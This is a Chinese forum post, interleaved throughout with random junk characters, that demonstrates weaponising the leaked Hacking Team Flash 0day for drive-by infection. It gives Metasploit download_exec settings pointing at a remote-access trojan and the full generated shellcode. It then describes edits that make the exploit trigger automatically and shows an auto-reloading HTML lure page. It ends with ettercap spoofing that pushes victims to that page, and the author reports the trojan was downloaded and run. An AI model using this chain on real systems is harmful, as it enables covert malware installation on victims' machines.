|
0 F3 `& N6 J; ]4 D9 t 三、flash 0day之手工代码修改制作下载者实例入侵演示 7 U& r1 R: `0 r! L) }
( |. ?) g+ k3 E3 e0 l
; l6 B) _7 M* q1 k( f
利用到的工具: " E( `5 m$ K5 W; T. S
5 K/ d4 H e( F+ T5 W1 h+ w* d" @2 ^ Q8 d
Msf . z/ F" a# r7 K
0 |( y" y/ b& A4 q
" e: R! F, w1 e0 b
Ettercap
o! A' j% `1 R# y2 S) S # n9 P4 X7 R( Y; l5 B7 E! g
6 J) z. \' F; T: d
Adobe Flash CS6
. V) O% i: |* u$ H$ C
% T& w0 k% z: r* T* Z4 v& e
& i% r( U9 c! a( j" O; ?" D Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
# z4 ?7 v+ j- W) }' i" q% Q; @* O* f
; s6 O2 k$ o: w
; c9 `4 D* ~5 d 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options / E D7 t f% O( o; w" d
H. n3 p7 a, b; G
1 K, i. Z2 \; j! R3 ^' }$ p
如图: ; W7 K' M7 g, J
1 j2 G0 s/ c* a: @# l5 ^+ e5 d& M* u$ x5 l( C5 r7 i# h+ O
) B+ M0 `9 F/ m# ]- t1 Q
5 u' b9 W: K7 | o
1 v" K) W" Y |. t; F
f$ Q1 J1 k6 O$ V
3 F7 Q/ D8 ?( Y4 r. g4 E9 A: A6 J- L$ q4 T) R0 z/ A- n
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: / @; b1 x% v, E5 a; x: l
( Y3 Y: [! i$ k+ z8 v8 {/ U
^4 P4 X9 ^5 y, X5 e" C( y3 C
7 o' C6 n4 ^& T. d3 S: R 0 [1 U- m5 l1 \3 @3 {4 t$ T
/ g. s8 |5 `* O: [( z M  , @& P* T. z, C! W; f/ u& p
" W' E" j9 L1 t- y" b# w
$ E* y3 J7 E D3 x 然后执行generate -t dword生成shellcode,如下: 3 Z& w ~0 h: H+ b& @
8 R0 W) C3 G1 P7 l. a r, O
# y& f) Q9 z& a( y+ c$ K9 U! a  0 J7 S b& ~* I. t6 Q
9 m( f: R, i4 n% V7 B* ] h1 e# n
+ W: P" @" ], k/ u' C
复制代码到文本下便于我们一会编辑flash exp,如下:
) G" J8 L: W6 T8 d/ T ( D& g, P7 w% A( v
. c$ o2 M \1 ~1 } 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 6 V- {3 z& [( k* k1 z0 D8 d
" {5 I, D4 `5 [2 z+ ?* S/ C' A) j
5 ^' l9 U7 `2 [# g' O' ^ 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, ! _1 s0 W6 U3 f8 n9 s+ ?
" m* _, t; k( ?
. I. x8 ]# D, l9 }6 a4 c 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
! G; m; a& S/ s/ m! \ 2 Q! t; f3 z- b
# _+ ~; y; O1 Y9 j X
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
2 b/ `" C/ ?; A( d5 t. o4 w2 q" v* N : p& j8 h9 c$ M5 [, d1 X2 \7 g
3 ]' H6 M3 p y. P1 a( D/ ]
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
% f$ d' G g0 p1 o1 S9 P0 L7 p
! u: A" ~& Y ~, d. P- u& z
0 m- Z0 D' A% l 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
3 h, O+ j* k8 O" K 6 T d ?) Z5 \: m5 X* u( ?
, j0 w& L$ k+ g* t
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 9 h! }3 U, l: d+ z+ A: b
; p& o& R( u; _) S% @) s
* u% A+ |! t- S$ l( D* J 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
2 f6 M$ _4 b, c: K( l3 C3 e % u Z i' v9 G. J/ q$ u
; U# O- p" @3 X: k 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
7 q% A7 u1 K3 j# m 8 K" p- M+ R" Q+ {8 h$ \; L p
1 `. s6 ?' s j2 m" O3 x9 t 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 5 h! ]! B) E. f7 f) x; H
2 c7 L: v& H9 Y8 w2 r/ a9 E0 j* ^: a% f
; p( c! ^6 q! A 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
& U. `2 [7 W* C- p" x
' W: z7 C; Q" Y* @& N
+ R8 f, ?. x" P3 y 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
4 z7 h% l3 v) A9 u5 k# p 9 k* s- _! W# ]6 i3 r; M q4 Y k
6 C m4 i* K5 X" E$ q
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
# ]: r5 d. @" y i7 [6 C 2 B) ]. d& o2 Z1 u) g
, @6 k1 K7 t2 L
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 B& v6 Q4 j" l$ A" T
$ N0 c6 j! V- K7 H: i
; E0 A/ q; S7 O+ l
& [4 L% v7 @6 N: J: _% E0 Q / ]( r1 n$ v5 c" K
2 e6 Z5 m4 ?; B4 d5 |0 C
% q4 }6 B n* F1 F, T$ X5 O |
# k8 @. {. U3 ?. t% J- H! {
* [5 X- _5 t! O/ g' C0 e6 i 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 0 r/ H ?! u! m
& t: l6 ~2 M$ e
- K9 P* v5 v+ K. ` 
+ M& J. A4 s0 P0 G- z. g7 e 2 h$ }1 B/ U. j3 ~9 ?2 D8 X4 a
g6 i5 H- l' U" i( M1 Z! V
先修改ShellWin32.as,部分源代码如图:
: ]! e) ~: D9 z- t+ R
" g1 E% d& y& b* S4 i" _! P4 _
2 q) ], C% r) j [( Q
/ x$ n5 h( } Q! }1 `6 W H j ]. L
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
9 p' m; [0 h y2 H q
$ e4 w9 c' c0 p: T9 y; G$ y# ~+ [- D( L1 d2 v6 M* Y3 U
 : G9 P/ ?3 J5 L" Q; o$ X
: i- N! j8 G8 ?+ p# y9 c9 n4 d
- _8 N9 k7 s. f$ l* H
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
: x8 h$ P3 I4 ]* i* U 0 @% [* C9 e6 C2 T6 B6 i& ]8 {
# {& L% U4 g$ B2 P4 m+ S# m  " N6 M8 T0 }. v3 k9 e( O9 M
3 j! q J/ G- D3 [
4 k7 O4 I" E" ]7 O( @# u, w
换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
" q* I- A P0 b& g
4 L( l* X7 l: E; P, O r& r$ @% m1 ^ H, b& d4 ?! T3 V
" I, a: f* e. ~- a }- l
' b' w9 V9 ?2 y, D* Y# ]- _
# x: c {( t; l- G9 F! J, o3 O2 b6 p $ ]9 E/ p0 K9 I3 c8 |3 Q( C
6 b5 M: ]( R/ n3 G a+ Z
$ B9 W$ y& I: x1 T" x3 z: \) t9 Z, k  - T* x i; Y2 @
( K: x2 S+ R7 e0 l
( f0 M9 A. R0 u# t3 H
然后点保存,下面我们来编译一下,打开 5 `9 `; D8 J- E: F8 l
5 E/ n+ m$ h8 o/ O4 y$ D+ a3 J! Z
7 Y" s Q4 f, C
exp1.fla然后点文件-发布,看看编译没错误
N6 q& r3 z- k% S; h6 n; w
9 L z8 y9 n- R1 R& B: v" ]# r
8 p; G3 P/ N" ]/ D, [" I5 P2 D- _) K
: M1 i- w E6 Y' Z 4 ^: w4 @9 @# N' ?9 N
" ]6 `; @* J6 V & r; `, }% T8 x
( U% h! k) M! @2 z$ k: g- }
% b* Q$ X& P' c7 i- S
! o" w4 i3 F- }" g7 r
5 T! Y& F( [( E e! A: S4 F& O! Z& z, a. [" p8 H) M4 u
. L8 @% N/ M7 P. u4 m . j, P6 u- S7 u0 o4 ]6 Y0 p9 z9 o- ^
" L+ _# u: ~3 J5 b% M( ]: y$ C 然后我们把生成的 5 d* r& W \: K: X
1 W9 S% T: L' i
0 ?# v; D/ L6 o$ T, Y exp1.swf丢到kailinux 的/var/www/html下: 1 p9 Q3 c; w/ e4 b; L4 \5 X) o7 c
2 L7 \" z2 ~6 k
" o! {5 k: z, | d4 J* `2 ~ 然后把这段代码好好编辑一下
7 ^6 Q+ k0 r5 p# l# P9 _ : H, t( v/ X8 |( K
1 P4 F* P; W4 }9 @/ a6 _
; T! [& ]' i* g5 v" R 6 c3 H+ h7 p0 t# j8 H
4 o( k6 B e- m/ I # g; g! p& \5 D3 f" E
2 z2 o- }. J" P$ `: M) [8 c( U+ C! d
+ N8 h7 e1 ^- a8 v, W. M. o
6 L% p3 m" p, h; Q5 F* N. ? d5 W
" J5 Y. Q5 B" Q* X( A) A % K I6 y3 U1 `/ O
" f5 y7 I( n9 [+ a& d
9 Z! u% `6 _# @- h9 g7 N5 v8 |
1 c U0 ?( t4 G- O5 z 4 L7 k2 a1 k1 a4 g
( }& j) S+ C" } ; q$ r" |2 ^- g0 b; N: v' Q8 e6 D
# f8 h6 |$ D c" x6 T+ s5 o
* {+ p4 W5 B4 R0 z: f: V% F <!DOCTYPE html> 0 S, P( {( M0 V
5 v n9 c1 d' ~3 V) _" v) P! D& n: J
) d; P: ^. s& M$ X6 Q n# O
<html> 1 O7 \, G0 V0 F' V9 w" e$ y5 n! ?
1 T# T0 Z/ ~3 [% l8 Z2 j( S: ^
$ W# Y, b* J+ x5 r <head>
3 G8 d0 U8 h$ R
j- N% F% a% h( @5 V! _2 h, t: {8 w, z: M8 R( `
<meta http-equiv="Content-Type" content="text/html; ' F1 o6 p7 Z0 f
* W6 G" g! p5 \, w4 X/ I% }
" ]& @+ o2 ^% N( s) }7 v
charset=utf-8"/>
, a/ d6 m' U5 ]* V' W- k; g! v2 ^ & A; c. {6 \! Q& C
2 o8 N* @. K( `
</head>
0 x' |! Z, R8 B7 E/ A4 }
6 P; E1 C5 W7 d0 s Q
' b7 J; U8 e! @! v3 x <body> 0 G0 K" y# B( U* r
9 |8 m2 F. @$ M
/ j8 j. e" T/ O. l$ ~
<h2> Please wait, the requested page is loading...</h2>
1 L( @9 W, B+ M7 S9 J; m8 j' ~5 V- w
6 n9 u7 U% j+ H0 X! P3 w5 I: |: s& ~9 |6 {! q' t# [
<br>
* s' A+ O4 Y: f" y6 } M6 m/ T
; E: V' `' }, v" t) s4 T; R0 D- F O! h6 W9 I+ e, W
<OBJECT ( J5 h& J$ t6 r0 S8 j
4 t1 E" V5 J3 s& e G4 J! G
: _# ]5 `! j X7 T5 @6 |1 y classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
1 ^. k) F1 z; r/ g+ u $ y" g+ i: X7 m1 R# P
) ^' s, k' |. k. ?7 Z, i5 H
VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
4 ~' ?9 m; j; A) R& t) o( v* P
( `8 ~9 U- J" A6 k4 a2 |0 m! P& {) C$ c8 A0 G. }8 m
</body> 8 B! Q* Z/ Z( P
, Y8 d D/ ]" ]$ ?# C- g
# n1 [( O$ j0 ]+ ^! N4 m/ u3 | <script>
$ _; n: C1 m# V! z7 x 0 N% t& B+ O9 h T6 Y* ^
4 e7 Z+ w- a7 G2 }. K: b
setTimeout(function () {
" N5 r+ x( d4 o; k8 K5 ^! s
; v# F+ S* h3 N
! N4 W- l" I/ N6 Q6 }4 [& O9 _& v
5 T; o) ~% j5 Y, g
: s% U2 P" y l. S% I2 Z( s0 }/ `- L2 }; G3 o: t( M. M9 `/ K
window.location.reload();
. A$ R8 W5 F. z* e3 r6 b8 Z
* s6 X f- L1 `: Y+ i. w- \1 W! H) ]9 M. e* S( P
}, 10000); , U2 s( M, a/ L! y1 s+ |
: _& c" H( m8 K* v' i
0 ?- U& o- H$ }4 v! w
. ~, V2 y7 D& b+ ], Y
2 ~ _% P, f+ x0 g! q
! r$ i7 f+ {! F9 A </script> % T& }9 ^7 E F& t6 m' I: w
, g) j* m* v/ F# [! P N( a
) _3 Q9 x1 H' e9 F1 O </html> 6 t; r+ y, l) ]3 d9 S# D) z) P
; `0 l6 p/ w0 ?6 p6 H. Y2 ?2 e
$ O' W+ R6 w$ G/ D: ?
0 u0 j" P+ g/ H3 j0 T 0 }+ N; A1 {: o. O6 t
4 J: [! f* o9 @; s2 @! o" g: G 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
! z" b' @0 n; w 5 p( G1 [$ F: o) W, ]5 q2 f5 |
1 a# E& q$ m0 @9 t( T
 , E5 f0 \. N$ m8 x
/ U% W# u- ~* x
/ w" P3 }+ ^) f * [( j, h) K8 I# B; r7 ]" W
7 T8 U* n6 S9 v* ~7 R4 P: n) I8 u5 W3 H. s
$ l9 ^5 Q# @- I
) `7 w# z2 v6 O% X2 I5 g) \# I2 O# O1 l2 V% L# }6 L0 X; {
: n7 b/ M4 ^) k7 Q8 k1 R % U5 q4 Z/ Q1 m: |7 l" ~9 s$ i
9 v! G% G3 a, N! u, | 3 I+ O$ J' E, Y+ t
3 k4 ~! w. [) w* v2 U- i/ D( h: ]
$ z" s @7 ]' b# W 下面我们用ettercap欺骗如图:
. Q: B. j' X8 V1 m* Q; [9 _' s: p; I 2 Q! z8 X8 j* [" t$ p
( Q$ h/ G% p3 s$ `* ^
7 d2 h8 y/ e7 @% M
( |5 r+ b& i# A: z# l+ X J8 j9 R! Q5 m& B1 N5 Y
) q: ?! J/ C9 r 0 o! a% n' U0 T( B" a
; w* A! n$ I/ q6 c+ q 下面我们随便访问个网站看看: % A! v) D) W6 L' F9 O
4 r1 g0 e; w2 ~5 h! i' v/ l& W
/ N0 ]4 |3 F, y 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 7 \+ Z( q0 g4 d6 K( |/ w- S
- |! N! u' ~1 j. H: R3 y
. {7 M# K& _, H) Y+ k L0 K
; u, m0 I4 h! m$ m0 g6 f4 ~ 6 I& w9 \% A* T- O9 c
1 X+ s$ H# B% _5 U; |
我们看另一台, . w3 b3 @5 A- W2 w0 M7 W& Q
( q% I _! ]/ K( N# D5 a( x4 g
$ _9 u! l' r( A1 r! `0 B 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 ) d; k: c; |3 J# n
| 
发表于 2018-10-20 20:28:55
收藏
支持
反对